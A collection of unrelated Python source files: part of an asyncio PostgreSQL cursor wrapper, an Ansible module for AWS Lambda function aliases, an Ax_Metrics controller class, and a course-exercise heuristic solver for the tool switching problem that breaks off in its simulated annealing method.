self._impl.nextset() # raises psycopg2.NotSupportedError
@asyncio.coroutine
def setoutputsize(self, size, column=None):
# Does nothing
self._impl.setoutputsize(size, column)
@asyncio.coroutine
def copy_from(self, file, table, sep='\t', null='\\N', size=8192,
columns=None):
raise psycopg2.ProgrammingError(
"copy_from cannot be used in asynchronous mode")
@asyncio.coroutine
def copy_to(self, file, table, sep='\t', null='\\N', columns=None):
raise psycopg2.ProgrammingError(
"copy_to cannot be used in asynchronous mode")
@asyncio.coroutine
def copy_expert(self, sql, file, size=8192):
raise psycopg2.ProgrammingError(
"copy_expert cannot be used in asynchronous mode")
@property
def timeout(self):
"""Return default timeout for cursor operations."""
return self._timeout
def __iter__(self):
warnings.warn("Iteration over cursor is deprecated",
DeprecationWarning,
stacklevel=2)
while True:
row = yield from self.fetchone()
if row is None:
raise StopIteration
else:
yield row
if PY_35: # pragma: no branch
def __aiter__(self):
return self
if not PY_352:
__aiter__ = asyncio.coroutine(__aiter__)
@asyncio.coroutine
def __anext__(self):
ret = yield from self.fetchone()
if ret is not None:
return ret
else:
raise StopAsyncIteration # noqa
@asyncio.coroutine
def __aenter__(self):
return self
@asyncio.coroutine
def __aexit__(self, exc_type, exc_val, exc_tb):
self.close()
return
| |
#!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: lambda_alias
short_description: Creates, updates or deletes AWS Lambda function aliases.
description:
- This module allows the management of AWS Lambda functions aliases via the Ansible
framework. It is idempotent and supports "Check" mode. Use module M(lambda) to manage the lambda function
itself and M(lambda_event) to manage event source mappings.
version_added: "2.2"
author: Pierre Jodouin (@pjodouin), Ryan Scott Brown (@ryansb)
options:
function_name:
description:
- The name of the function alias.
required: true
state:
description:
- Describes the desired state.
required: true
default: "present"
choices: ["present", "absent"]
name:
description:
- Name of the function alias.
required: true
aliases: ['alias_name']
description:
description:
- A short, user-defined function alias description.
required: false
version:
description:
- Version associated with the Lambda function alias.
A value of 0 (or omitted parameter) sets the alias to the $LATEST version.
required: false
aliases: ['function_version']
requirements:
- boto3
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
---
# Simple example to create a lambda function and publish a version
- hosts: localhost
gather_facts: no
vars:
state: present
project_folder: /path/to/deployment/package
deployment_package: lambda.zip
account: 123456789012
production_version: 5
tasks:
- name: AWS Lambda Function
lambda:
state: "{{ state | default('present') }}"
name: myLambdaFunction
publish: True
description: lambda function description
code_s3_bucket: package-bucket
code_s3_key: "lambda/{{ deployment_package }}"
local_path: "{{ project_folder }}/{{ deployment_package }}"
runtime: python2.7
timeout: 5
handler: lambda.handler
memory_size: 128
role: "arn:aws:iam::{{ account }}:role/API2LambdaExecRole"
- name: Get information
lambda_info:
name: myLambdaFunction
register: lambda_info
- name: show results
debug:
msg: "{{ lambda_info['lambda_facts'] }}"
# The following will set the Dev alias to the latest version ($LATEST) since version is omitted (or = 0)
- name: "alias 'Dev' for function {{ lambda_info.lambda_facts.FunctionName }} "
lambda_alias:
state: "{{ state | default('present') }}"
function_name: "{{ lambda_info.lambda_facts.FunctionName }}"
name: Dev
description: Development is $LATEST version
# The QA alias will only be created when a new version is published (i.e. not = '$LATEST')
- name: "alias 'QA' for function {{ lambda_info.lambda_facts.FunctionName }} "
lambda_alias:
state: "{{ state | default('present') }}"
function_name: "{{ lambda_info.lambda_facts.FunctionName }}"
name: QA
version: "{{ lambda_info.lambda_facts.Version }}"
description: "QA is version {{ lambda_info.lambda_facts.Version }}"
when: lambda_info.lambda_facts.Version != "$LATEST"
# The Prod alias will have a fixed version based on a variable
- name: "alias 'Prod' for function {{ lambda_info.lambda_facts.FunctionName }} "
lambda_alias:
state: "{{ state | default('present') }}"
function_name: "{{ lambda_info.lambda_facts.FunctionName }}"
name: Prod
version: "{{ production_version }}"
description: "Production is version {{ production_version }}"
'''
RETURN = '''
---
alias_arn:
description: Full ARN of the function, including the alias
returned: success
type: str
sample: arn:aws:lambda:us-west-2:123456789012:function:myFunction:dev
description:
description: A short description of the alias
returned: success
type: str
sample: The development stage for my hot new app
function_version:
description: The qualifier that the alias refers to
returned: success
type: str
sample: $LATEST
name:
description: The name of the alias assigned
returned: success
type: str
sample: dev
'''
import re
try:
import boto3
from botocore.exceptions import ClientError, ParamValidationError, MissingParametersError
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import (HAS_BOTO3, boto3_conn, camel_dict_to_snake_dict, ec2_argument_spec,
get_aws_connection_info)
class AWSConnection:
"""
Create the connection object and client objects as required.
"""
def __init__(self, ansible_obj, resources, boto3_=True):
try:
self.region, self.endpoint, aws_connect_kwargs = get_aws_connection_info(ansible_obj, boto3=boto3_)
self.resource_client = dict()
if not resources:
resources = ['lambda']
resources.append('iam')
for resource in resources:
aws_connect_kwargs.update(dict(region=self.region,
endpoint=self.endpoint,
conn_type='client',
resource=resource
))
self.resource_client[resource] = boto3_conn(ansible_obj, **aws_connect_kwargs)
# if region is not provided, then get default profile/session region
if not self.region:
self.region = self.resource_client['lambda'].meta.region_name
except (ClientError, ParamValidationError, MissingParametersError) as e:
ansible_obj.fail_json(msg="Unable to connect, authorize or access resource: {0}".format(e))
try:
self.account_id = self.resource_client['iam'].get_user()['User']['Arn'].split(':')[4]
except (ClientError, ValueError, KeyError, IndexError):
self.account_id = ''
def client(self, resource='lambda'):
return self.resource_client[resource]
def pc(key):
"""
Changes python key into Pascale case equivalent. For example, 'this_function_name' becomes 'ThisFunctionName'.
:param key:
:return:
"""
return "".join([token.capitalize() for token in key.split('_')])
def set_api_params(module, module_params):
"""
Sets module parameters to those expected by the boto3 API.
:param module:
:param module_params:
:return:
"""
api_params = dict()
for param in module_params:
module_param = module.params.get(param, None)
if module_param:
api_params[pc(param)] = module_param
return api_params
def validate_params(module, aws):
"""
Performs basic parameter validation.
:param module: Ansible module reference
:param aws: AWS client connection
:return:
"""
function_name = module.params['function_name']
# validate function name
if not re.search(r'^[\w\-:]+$', function_name):
module.fail_json(
msg='Function name {0} is invalid. Names must contain only alphanumeric characters and hyphens.'.format(function_name)
)
if len(function_name) > 64:
module.fail_json(msg='Function name "{0}" exceeds 64 character limit'.format(function_name))
# if parameter 'function_version' is zero, set it to $LATEST, else convert it to a string
if module.params['function_version'] == 0:
module.params['function_version'] = '$LATEST'
else:
module.params['function_version'] = str(module.params['function_version'])
return
def get_lambda_alias(module, aws):
"""
Returns the lambda function alias if it exists.
:param module: Ansible module reference
:param aws: AWS client connection
:return:
"""
client = aws.client('lambda')
# set API parameters
api_params = set_api_params(module, ('function_name', 'name'))
# check if alias exists and get facts
try:
results = client.get_alias(**api_params)
except (ClientError, ParamValidationError, MissingParametersError) as e:
if e.response['Error']['Code'] == 'ResourceNotFoundException':
results = None
else:
module.fail_json(msg='Error retrieving function alias: {0}'.format(e))
return results
def lambda_alias(module, aws):
"""
Adds, updates or deletes lambda function aliases.
:param module: Ansible module reference
:param aws: AWS client connection
:return dict:
"""
client = aws.client('lambda')
results = dict()
changed = False
current_state = 'absent'
state = module.params['state']
facts = get_lambda_alias(module, aws)
if facts:
current_state = 'present'
if state == 'present':
if current_state == 'present':
# check if alias has changed -- only version and description can change
alias_params = ('function_version', 'description')
for param in alias_params:
if module.params.get(param) != facts.get(pc(param)):
changed = True
break
if changed:
api_params = set_api_params(module, ('function_name', 'name'))
api_params.update(set_api_params(module, alias_params))
if not module.check_mode:
try:
results = client.update_alias(**api_params)
except (ClientError, ParamValidationError, MissingParametersError) as e:
module.fail_json(msg='Error updating function alias: {0}'.format(e))
else:
# create new function alias
api_params = set_api_params(module, ('function_name', 'name', 'function_version', 'description'))
try:
if not module.check_mode:
results = client.create_alias(**api_params)
changed = True
except (ClientError, ParamValidationError, MissingParametersError) as e:
module.fail_json(msg='Error creating function alias: {0}'.format(e))
else: # state = 'absent'
if current_state == 'present':
# delete the function
api_params = set_api_params(module, ('function_name', 'name'))
try:
if not module.check_mode:
results = client.delete_alias(**api_params)
changed = True
except (ClientError, ParamValidationError, MissingParametersError) as e:
module.fail_json(msg='Error deleting function alias: {0}'.format(e))
return dict(changed=changed, **dict(results or facts))
def main():
"""
Main entry point.
:return dict: ansible facts
"""
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
state=dict(required=False, default='present', choices=['present', 'absent']),
function_name=dict(required=True, default=None),
name=dict(required=True, default=None, aliases=['alias_name']),
function_version=dict(type='int', required=False, default=0, aliases=['version']),
description=dict(required=False, default=None),
)
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
mutually_exclusive=[],
required_together=[]
)
# validate dependencies
if not HAS_BOTO3:
module.fail_json(msg='boto3 is required for this module.')
aws = AWSConnection(module, ['lambda'])
validate_params(module, aws)
results = lambda_alias(module, aws)
module.exit_json(**camel_dict_to_snake_dict(results))
if __name__ == '__main__':
main()
| |
"""
Ax_Metrics - Servant Main Controller - Recommended Ax_Metrics Public Interface
------------------------------------------------------------------------------
Author: Dan Kamins <dos at axonchisel dot net>
Copyright (c) 2014 Dan Kamins, AxonChisel.net
"""
# ----------------------------------------------------------------------------
import time
import copy
from axonchisel.metrics.foundation.ax.obj import AxObj
import axonchisel.metrics.foundation.ax.plugin as axplugin
from axonchisel.metrics.foundation.data.multi import MultiDataSeries
from axonchisel.metrics.foundation.query.qghosts import QGhosts
from axonchisel.metrics.io.erout.interface import EROut
from axonchisel.metrics.run.mqengine.mqengine import MQEngine
from .config import ServantConfig
from .request import ServantRequest
from .state import ServantState
import logging
log = logging.getLogger(__name__)
# ----------------------------------------------------------------------------
class Servant(AxObj):
"""
Servant Main Controller and public interface.
This is the recommended application layer interface to Ax_Metrics.
Usage:
1. Load MetSet (all metrics) and QuerySet (all queries).
2. Construct and populate ServantConfig object, including
MetSet, QuerySet, and emfetch_extinfo and erout_extinfo
(containing output targets such as streams to write to).
3. Construct Servant instance around ServantConfig.
4. Construct and populate ServantRequest object, including
list of queries (by id) to run and list of EROut plugins (by id)
to process results with.
5. Invoke servant.query(request).
6. Optionally repeat with additional ServantRequests.
Lifecycle: A Servant instance can process as many requests
as desired, but only one at a time.
EROut plugins are created and destroyed around each request
(which may itself contain multiple queries).
"""
def __init__(self, config):
# Set valid default state:
self._config = None # (ServantConfig)
self._state = None # (ServantState)
self._reset_state()
# Apply initial values from kwargs:
self._assert_type("config", config, ServantConfig)
self._config = config
# Log begin:
log.info("Servant initialized (%s)", config)
#
# Public Methods
#
def process(self, request):
"""
Main entry-point to process ServantRequest.
"""
self._assert_type("request", request, ServantRequest)
# Log begin:
t0 = time.time()
log.info("Processing Request %s", request)
self._reset_state(request)
self._create_erouts()
self._create_mqengine()
self._run_queries()
self._destroy_erouts()
# Log end:
t9 = time.time()
log.info("Completed Request %s in %0.3fs", request, t9-t0)
#
# Public Properties
#
@property
def config(self):
"""ServantConfig, as specified at construction time."""
return self._config
#
# Internal Methods
#
def _reset_state(self, request=None):
"""Reset internal state, optionally around given request."""
self._state = ServantState()
if request is not None:
self._state.request = request
def _create_erouts(self):
"""Instantiate and startup the EROut plugins and add to state."""
erout_plugin_ids = self._state.request.erout_plugin_ids
log.info("Creating EROuts (%s)", erout_plugin_ids)
for id in erout_plugin_ids:
ero = self._create_erout(id)
self._state.erouts.append(ero)
def _create_erout(self, erout_plugin_id):
"""Instantiate and startup single EROut plugin by id, returning it."""
plugin_load = {
'what': "EROut Plugin",
'def_module_name': 'axonchisel.metrics.io.erout.plugins',
'def_cls_name_pfx': 'EROut_',
'require_base_cls': EROut,
'plugin_id': erout_plugin_id,
}
cls = axplugin.load_plugin_class(**plugin_load)
extinfo = self._config.erout_extinfo_for(erout_plugin_id)
ero = cls(extinfo=extinfo)
ero.plugin_create()
return ero
def _destroy_erouts(self):
"""Final destroy cleanup on EROut plugins."""
log.info("Destroying EROuts (%s)", self._state.erouts)
for ero in self._state.erouts:
ero.plugin_destroy()
def _create_mqengine(self):
"""Create and configure MQEngine, storing in state."""
log.info("Creating MQEngine")
self._state.mqengine = MQEngine(
metset = self._config.metset,
emfetch_extinfo = self._config.emfetch_extinfo,
)
def _run_queries(self):
"""Run our queries and output results -- the core logic loop."""
# Iterate requested queries:
query_ids = self._state.request.query_ids
for i, query_id in enumerate(query_ids):
log.info("Running query (%d/%d) #%s", i+1, len(query_ids), query_id)
# Load and adjust query:
q = self._config.queryset.get_query_by_id(query_id)
if self._state.request.collapse:
q = self._collapse_query(q)
if self._state.request.noghosts:
q = self._bust_query_ghosts(q)
# Run query in MQEngine
mdseries = self._state.mqengine.query(q)
if self._state.request.collapse:
mdseries = self._collapse_mdseries(mdseries)
# Process query results through all EROuts:
for ero in self._state.erouts:
ero.output(mdseries, query=q)
def _collapse_query(self, q):
"""
Return copy of query, collapsed for collapse mode.
Collapsing the query does:
- query framespec granularity is set to match range unit
- query framespec accumulate mode is enabled
"""
q = copy.deepcopy(q)
tmfrspec = q.qtimeframe.tmfrspec
tmfrspec.accumulate = True
tmfrspec.gran_unit = tmfrspec.range_unit
return q
def _bust_query_ghosts(self, q):
"""
Return copy of query, with ghosts removed.
"""
q = copy.deepcopy(q)
q.qghosts = QGhosts()
return q
def _collapse_mdseries(self, mdseries):
"""
Return copy of MultiDataSeries, collapsed for collapse mode.
Collapsing the MultiDataSeries does:
- only last data point of each series is preserved.
"""
mdseries2 = MultiDataSeries()
for dseries in mdseries.iter_series():
dseries2 = copy.deepcopy(dseries)
dseries2.reset_points()
dseries2.add_point(dseries.get_point(-1)) # (keep only last point)
mdseries2.add_series(dseries2)
return mdseries2
def __unicode__(self):
return (u"Servant({self._config}, {self._state})"
.format(self=self))
| |
########################################################################################################################
# Heuristic Solver for the Tool Switching Problem
#
# Exercises for WS15 Computational Techniques
# Group members (alphabetical): Morariu, Smolka, Zeba
########################################################################################################################
import copy
import random
import math
import itertools
import collections
########################################################################################################################
#
# Neighborhood Structures
# (Exercise 3)
#
########################################################################################################################
def singleRandomSwapNeighborhood(job_sequence,resolution=1):
for i in range(1,len(job_sequence)*resolution):
new_sequence = copy.deepcopy(job_sequence)
a,b=0,0
while a==b:
a=random.randrange(0,len(job_sequence))
b=random.randrange(0,len(job_sequence))
new_sequence[a],new_sequence[b]=new_sequence[b],new_sequence[a]
yield new_sequence
def singleNeighborSwapNeighborhood(job_sequence):
for i in range(1,len(job_sequence)):
new_sequence = copy.deepcopy(job_sequence)
new_sequence[i],new_sequence[i-1]=new_sequence[i-1],new_sequence[i]
yield new_sequence
def dualNeighborSwapNeighborhood(job_sequence):
for i in range(1,len(job_sequence)):
new_sequence = copy.deepcopy(job_sequence)
new_sequence[i],new_sequence[i-1]=new_sequence[i-1],new_sequence[i]
for sequence in singleNeighborSwapNeighborhood(new_sequence):
yield sequence
def singlePairSwapNeighborhood(job_sequence):
for i in range(len(job_sequence)):
for j in range(i+1,len(job_sequence)):
if i!=j:
new_sequence = copy.deepcopy(job_sequence)
new_sequence[i],new_sequence[j]=new_sequence[j],new_sequence[i]
yield new_sequence
def singleSliceSwapNeighborhood(job_sequence,k=None):
if k==None:
k=len(job_sequence)/10
if k==0:
k=min(3,len(job_sequence))
for i in range(len(job_sequence)/k):
for j in range(i+1,len(job_sequence)/k):
if i!=j:
new_sequence = copy.deepcopy(job_sequence)
new_sequence[i*k:i*k+k],new_sequence[j*k:j*k+k]=new_sequence[j*k:j*k+k],new_sequence[i*k:i*k+k]
yield new_sequence
def singleSliceRandomizeNeighborhood(job_sequence,k=None):
if k==None:
k=len(job_sequence)/10
if k==0:
k=min(3,len(job_sequence))
for i in range(len(job_sequence)/k):
new_sequence = copy.deepcopy(job_sequence)
new_slice = []
old_slice = copy.deepcopy(new_sequence[i*k:i*k+k])
while len(old_slice):
choice=random.choice(old_slice)
new_slice.append(choice)
old_slice.remove(choice)
new_sequence[i*k:i*k+k] = new_slice
yield new_sequence
def rotatingNeighborhood(job_sequence):
new_sequence = collections.deque(job_sequence)
for i in range(len(job_sequence)):
new_sequence.rotate(1)
yield list(new_sequence)
def recursiveRandomSwapNeighborhood(job_sequence,resolution=1,depth=3):
for new_sequence in singleRandomSwapNeighborhood(job_sequence):
yield new_sequence
if depth:
for other_sequence in recursiveRandomSwapNeighborhood(new_sequence,resolution,depth-1):
yield other_sequence
def multiRandomSwapNeighborhood(job_sequence,resolution=100,multi_resolution=0.1):
for i in range(len(job_sequence)*resolution):
new_sequence = copy.deepcopy(job_sequence)
for j in range(int(len(job_sequence)*multi_resolution)):
a,b=0,0
while a==b:
a=random.randrange(0,len(job_sequence))
b=random.randrange(0,len(job_sequence))
new_sequence[a],new_sequence[b]=new_sequence[b],new_sequence[a]
yield new_sequence
def multiRandomNeighborSwapNeighborhood(job_sequence,resolution,depth):
for k in range(len(job_sequence)*resolution):
new_sequence = copy.deepcopy(job_sequence)
for l in range(depth):
i=random.randrange(1,len(job_sequence))
new_sequence[i],new_sequence[i-1]=new_sequence[i-1],new_sequence[i]
yield new_sequence
def combinedNeighborhood(job_sequence,neighborhood_generator_function_a,neighborhood_generator_function_b):
for sequence_a in neighborhood_generator_function_a(job_sequence):
if random.uniform(0,1) > 0.1:
continue
for sequence_b in neighborhood_generator_function_b(sequence_a):
if random.uniform(0,1) > 0.1:
continue
yield sequence_b
########################################################################################################################
#
# Class for loading and solving ToSP problems with various (meta)heuristics
#
########################################################################################################################
class HeuristicSolver:
"""Heuristic Solver for the Tool Switching Problem
Exercises for WS15 Computational Techniques
Group members (alphabetical): Morariu, Smolka, Zeba
"""
def __init__(self):
self.n = 0 #Jobs
self.m = 0 #Tools
self.A = None #n x m Incidence Matrix
self.C = None #Machine capacity
self.log = None
self.console_output = True
self.stats = {"total_objective_evaluations":0,
"total_improvements":0,
"total_iterations":0,
"total_neighborhoods":0,
"objective_evaluations_since_last_improvement":0,
"best_objective_value": -1,
"improvements_by_neighborhood": {} }
def setC(self,c):
"""Set machine (tool) capacity"""
self.C=c
def getToolsForJob(self,j):
"""Returns the set of tools job j requires."""
#TODO: Maybe precompute
return set([i for i in range(self.m) if self.A[j][i] == 1])
########################################################################################################################
#
# Tool Sequence Optimization - Evaluation of Objective Function
#
########################################################################################################################
def minimizeSwitchesForJobSequence(self,job_sequence,abort_after_max=None):
"""For the given job sequence, return a sequence of tool configurations that tries to
minimize the number of total tool switches.
(Exercise 1)
Adaption: Incremental switch count evaluation: Option to abort after exceeding a certain switch count
Algorithm:
1. Initialize the first tool configuration with the tools needed by the first job
2. Until the first configuration is full:
Add a tool that is not yet in the configuration, and will be needed the soonest
3. For each job in the sequence, after the first:
Find the tools that need to be swapped in (set difference of new needed tools minus current configuration)
Sort the tools the can be swapped out by for how long they will not be needed
While there are tools that need to be swapped in:
Switch out the next longest not needed tool
Switch in the next needed tool
Increment switch count
"""
self.onEvaluateObjectiveFunction()
#TODO: More efficient implementation just for evaluating objective function
i=1
def rankTool(t): #Assigns a score to a tool based on the time until it will be needed again
for k in range(i+1,len(job_sequence)):
if t in self.getToolsForJob(job_sequence[k]):
return (k-(i+1))
return len(job_sequence)
switches=0
#Fill up empty slots of tool_sequence[0] with tools by ranking them by how soon they will be needed
first_tools=self.getToolsForJob(job_sequence[0])
additional_tools=sorted([tool for tool in range(self.m) if not tool in first_tools],key=rankTool)
additional_tools_index=0
while len(first_tools) < self.C and additional_tools_index < len(additional_tools):
first_tools.add(additional_tools[additional_tools_index])
additional_tools_index+=1
tool_sequence=[first_tools]
#We know which tools we must swap in after every job, so we search for the optimal tools to swap out.
for i in range(1,len(job_sequence)):
current_tools=tool_sequence[i-1]
needed_tools=self.getToolsForJob(job_sequence[i])
switch_in_tools=needed_tools.difference(current_tools)
next_tools=copy.deepcopy(current_tools)
switch_candidates = sorted([tool for tool in current_tools if not tool in needed_tools],key=rankTool,reverse=True)
switch_candidate_index = 0
for needed in switch_in_tools:
if len(next_tools) >= self.C:
if switch_candidate_index < len(switch_candidates):
next_tools.remove(switch_candidates[switch_candidate_index])
switch_candidate_index += 1
else:
raise ValueError("Machine capacity too small for job")
next_tools.add(needed)
switches += 1
if abort_after_max != None and switches >= abort_after_max:
return False,switches
tool_sequence.append(next_tools)
return (tool_sequence,switches)
########################################################################################################################
#
# Construction Heuristics
#
########################################################################################################################
def constructJobSequenceLinear(self):
return [i for i in range(self.n)]
def constructJobSequenceRandom(self):
jobs=[i for i in range(self.n)]
job_sequence=[]
while len(jobs):
j=random.choice(jobs)
job_sequence.append(j)
jobs.remove(j)
return job_sequence
def constructJobSequenceGreedy(self):
"""Construct a job sequence minimizing tool switches using a greedy algorithm.
(Exercise 2)
Algorithm:
1. Find pair of jobs with the largest common needed tool denominator
2. Add pair to the job sequence
2. For each remaining job:
Find the remaining job with the largest common needed tool denominator with the last job added to the job sequence
Add the chosen job to the sequence
"""
jobs=set([i for i in range(self.n)])
job_sequence=[]
best_pair=None
best_pair_intersect=-1
for j in jobs:
for l in jobs:
if j!=l:
tools_j=self.getToolsForJob(j)
tools_l=self.getToolsForJob(l)
intersect=len(tools_j.intersection(tools_l))
if intersect > best_pair_intersect:
best_pair_intersect=intersect
#Load the job needing more tools first (first loading is free)
if len(tools_j)>len(tools_l):
best_pair=(j,l)
else:
best_pair=(l,j)
best_pair_a,best_pair_b=best_pair
jobs.remove(best_pair_a)
jobs.remove(best_pair_b)
job_sequence=[best_pair_a,best_pair_b]
while len(jobs):
last_job=job_sequence[-1]
last_tools=self.getToolsForJob(last_job)
best=None
best_intersect=-1
for j in jobs:
tools_j=self.getToolsForJob(j)
intersect=len(last_tools.intersection(tools_j))
if intersect > best_intersect:
best=j
best_intersect=intersect
job_sequence.append(best)
jobs.remove(best)
return job_sequence
def constructJobSequencesGreedyJobClustering(self):
"""Construct a number of job sequences minimizing tool switches using an advanced greedy algorithm.
(Exercise 2)
Algorithm:
1. Group jobs into clusters based on intersection count
2. Greedily order jobs within clusters to maximize neighbor intersects
3. Permutate clusters to create job sequence variants
"""
jobs=set([i for i in range(self.n)])
clusters = [set() for i in range(self.n)]
mates = [0 for i in range(self.n)]
for j in jobs:
best_mate = None
best_mate_intersect = 0
for l in jobs:
if j!=l:
tools_j=self.getToolsForJob(j)
tools_l=self.getToolsForJob(l)
intersect=len(tools_j.intersection(tools_l))
if intersect > best_mate_intersect:
best_mate_intersect=intersect
best_mate=l
mates[j]=best_mate
added=True
while added:
added=False
for job,mate in enumerate(mates):
if not mate in clusters[job]:
clusters[job].add(mate)
added=True
for k,cluster in enumerate(clusters):
if mate in cluster:
if not job in cluster:
cluster.add(job)
added=True
superclusters=[]
for cluster in clusters:
intersected=False
for supercluster in superclusters:
if len(supercluster.intersection(cluster))!=0:
intersected=True
for item in cluster:
supercluster.add(item)
if not intersected:
superclusters.append(cluster)
for i in range(len(superclusters)):
for j in range(len(superclusters)):
if i!=j and len(superclusters[i].intersection(superclusters[j])):
raise
ordered_superclusters = []
for cluster in superclusters:
ordered_cluster=[]
best_pair=None
best_pair_intersect=-1
for j in cluster:
for l in cluster:
if j!=l:
tools_j=self.getToolsForJob(j)
tools_l=self.getToolsForJob(l)
intersect=len(tools_j.intersection(tools_l))
if intersect > best_pair_intersect:
best_pair_intersect=intersect
#Load the job needing more tools first (first loading is free)
if len(tools_j)>len(tools_l):
best_pair=(j,l)
else:
best_pair=(l,j)
best_pair_a, best_pair_b = best_pair
ordered_cluster.append(best_pair_a)
ordered_cluster.append(best_pair_b)
cluster.remove(best_pair_a)
cluster.remove(best_pair_b)
while(len(cluster)):
last_job=ordered_cluster[-1]
last_tools=self.getToolsForJob(last_job)
best=None
best_intersect=-1
for j in cluster:
tools_j=self.getToolsForJob(j)
intersect=len(last_tools.intersection(tools_j))
if intersect > best_intersect:
best=j
best_intersect=intersect
ordered_cluster.append(best)
cluster.remove(best)
ordered_superclusters.append(ordered_cluster)
job_sequences=[]
for permutation in itertools.permutations(ordered_superclusters):
job_sequence=[]
for cluster in permutation:
for item in cluster:
job_sequence.append(item)
job_sequences.append(job_sequence)
return job_sequences
def constructJobSequenceGreedyRandomized(self, alpha=None):
"""Construct a job sequence mimizing tool switches using a randomized greedy algorithm.
(Exercise 6.a)
Algorithm:
1. For each remaining job:
CL=Remaining jobs
RCL=Remaining jobs with promising intersection
Add a random job from RCL to the job sequence
"""
if alpha==None:
alpha=random.uniform(0,1)
jobs=set([i for i in range(self.n)])
job_sequence=[]
while len(jobs):
max_intersect=0
min_intersect=100000
for j in jobs:
tools_j=self.getToolsForJob(j)
if len(job_sequence):
intersect=len(self.getToolsForJob(job_sequence[-1]).intersection(tools_j))
else:
intersect=len(tools_j)
max_intersect=max(max_intersect,intersect)
min_intersect=min(min_intersect,intersect)
RCL=[]
for j in jobs:
tools_j=self.getToolsForJob(j)
if len(job_sequence):
intersect=len(self.getToolsForJob(job_sequence[-1]).intersection(tools_j))
else:
intersect=len(tools_j)
if intersect >= max_intersect - alpha * (max_intersect-min_intersect):
RCL.append(j)
chosen=random.choice(RCL)
job_sequence.append(chosen)
jobs.remove(chosen)
return job_sequence
########################################################################################################################
#
# Local Search
#
########################################################################################################################
def nextBestJobSequence(self,job_sequence,neighborhood_generator,first_improvement=True):
"""Try to improve the job sequence by evaluating the given neighborhood
(Exercise 3)
"""
best_job_sequence = job_sequence
_, min_switches = self.minimizeSwitchesForJobSequence(best_job_sequence)
improved=False
for sequence in neighborhood_generator:
#Incremental evaluation aborts if switch count is higher/equal than current minimum
_, new_min_switches = self.minimizeSwitchesForJobSequence(sequence, min_switches)
if new_min_switches < min_switches:
best_job_sequence=sequence
min_switches=new_min_switches
improved=True
if not neighborhood_generator.__name__ in self.stats["improvements_by_neighborhood"]:
self.stats["improvements_by_neighborhood"][neighborhood_generator.__name__]=0
self.stats["improvements_by_neighborhood"][neighborhood_generator.__name__]+=1
if first_improvement:
break
return best_job_sequence,min_switches,improved
def bestJobSequenceLocalSearch(self,job_sequence,neighborhood_generator_function):
"""Perform local search iterations on the job sequence until no more improvement can be made in switch count
(Exercise 3)
"""
improved = True
while improved:
self.onEvaluateNeighborhood()
neighborhood=neighborhood_generator_function(job_sequence)
job_sequence,min_switches,improved=self.nextBestJobSequence(job_sequence,neighborhood)
self.onNewBest(min_switches)
#print(min_switches)
return job_sequence,min_switches
########################################################################################################################
#
# Advanced Heuristics
#
########################################################################################################################
def bestJobSequenceVariableNeighborhoodSearch(self,job_sequence,neighborhood_generator_function_cycle, combine_step=False):
"""Perform local search iterations on the job sequence, by searching in a cycle of neighborhoods, until no more improvement can be made in switch count
(Exercise 5)
"""
improved = True
while improved:
#print("")
self.onIterate()
for i in range(len(neighborhood_generator_function_cycle)):
self.onEvaluateNeighborhood()
neighborhood_generator_function=neighborhood_generator_function_cycle[i]
#print(" "*i + neighborhood_generator_function.__name__ )
neighborhood=neighborhood_generator_function(job_sequence)
job_sequence,min_switches,improved=self.nextBestJobSequence(job_sequence,neighborhood)
if improved:
#print(" " *i + "New minimum: %d @ %d evals"%(min_switches,self.stats["total_objective_evaluations"]))
self.onNewBest(min_switches)
break
else:
#Swap the neighborhood to the end of the cycle, because it may not perform well in the current function area
pass
if combine_step:
improved = True
while improved:
#print("")
self.onIterate()
for i in range(len(neighborhood_generator_function_cycle)):
self.onEvaluateNeighborhood()
for j in range(len(neighborhood_generator_function_cycle)):
if i==j:
continue
neighborhood=combinedNeighborhood(job_sequence,neighborhood_generator_function_cycle[i],neighborhood_generator_function_cycle[j])
job_sequence,min_switches,improved=self.nextBestJobSequence(job_sequence,neighborhood)
if improved:
self.onNewBest(min_switches)
break
else:
pass
if improved:
break
return job_sequence,min_switches
def bestJobSequenceGRASP(self,iterations=100):
"""Randomized greedy neighborhood search
(Exercise 6.a)
"""
cycle=[singleNeighborSwapNeighborhood,singleRandomSwapNeighborhood]
best_job_sequence = self.constructJobSequenceGreedyRandomized()
_,best_switches=self.minimizeSwitchesForJobSequence(best_job_sequence)
best_job_sequence, best_switches = self.bestJobSequenceVariableNeighborhoodSearch(best_job_sequence, cycle)
for i in range(iterations):
self.onIterate()
job_sequence = self.constructJobSequenceGreedyRandomized()
_,switches=self.minimizeSwitchesForJobSequence(job_sequence)
job_sequence, switches = self.bestJobSequenceVariableNeighborhoodSearch(job_sequence, cycle)
if switches < best_switches:
best_job_sequence=job_sequence
best_switches=switches
self.onNewBest(best_switches)
return best_job_sequence
def bestJobSequenceGVNS(self,job_sequence,shaker_neighborhood_function,local_neighborhood_cycle,iterations=3,k_max=100):
"""Generalized variable neighborhood search
(Exercise 6.b)
"""
best_job_sequence=job_sequence
_,best_switches=self.minimizeSwitchesForJobSequence(best_job_sequence)
for i in range(iterations):
self.onIterate()
k=0
#print("")
#print("Iteration %d"%i)
while k < k_max:
self.onEvaluateNeighborhood()
shaker_neighborhood=shaker_neighborhood_function(job_sequence,1,k)
for shake_sequence in shaker_neighborhood:
break
job_sequence,switches=self.bestJobSequenceVariableNeighborhoodSearch(job_sequence,local_neighborhood_cycle)
if switches<best_switches:
#print("New best %d, k=%d"%(switches,k))
self.onNewBest(switches)
best_job_sequence=job_sequence
best_switches=switches
k=1
else:
k+=1
#print("No new best k=%d"%k)
return best_job_sequence
def bestJobSequenceSimulatedAnnealing(self,job_sequence,neighborhood_generator_function,iterations=1000,start_T=1.0):
"""Simulated Annealing
(Exercise 6.c)
"""
def acceptance_probability(x,y,T):
if T==0:
return y<x
return 1 if y<x else math.exp(-float(y-x)/T)
max_evaluations=iterations*25
evaluations=0
_, x = self.minimizeSwitchesForJobSequence(job_sequence)
best_sequence = job_sequence
best_switches = x
for k in range(iterations):
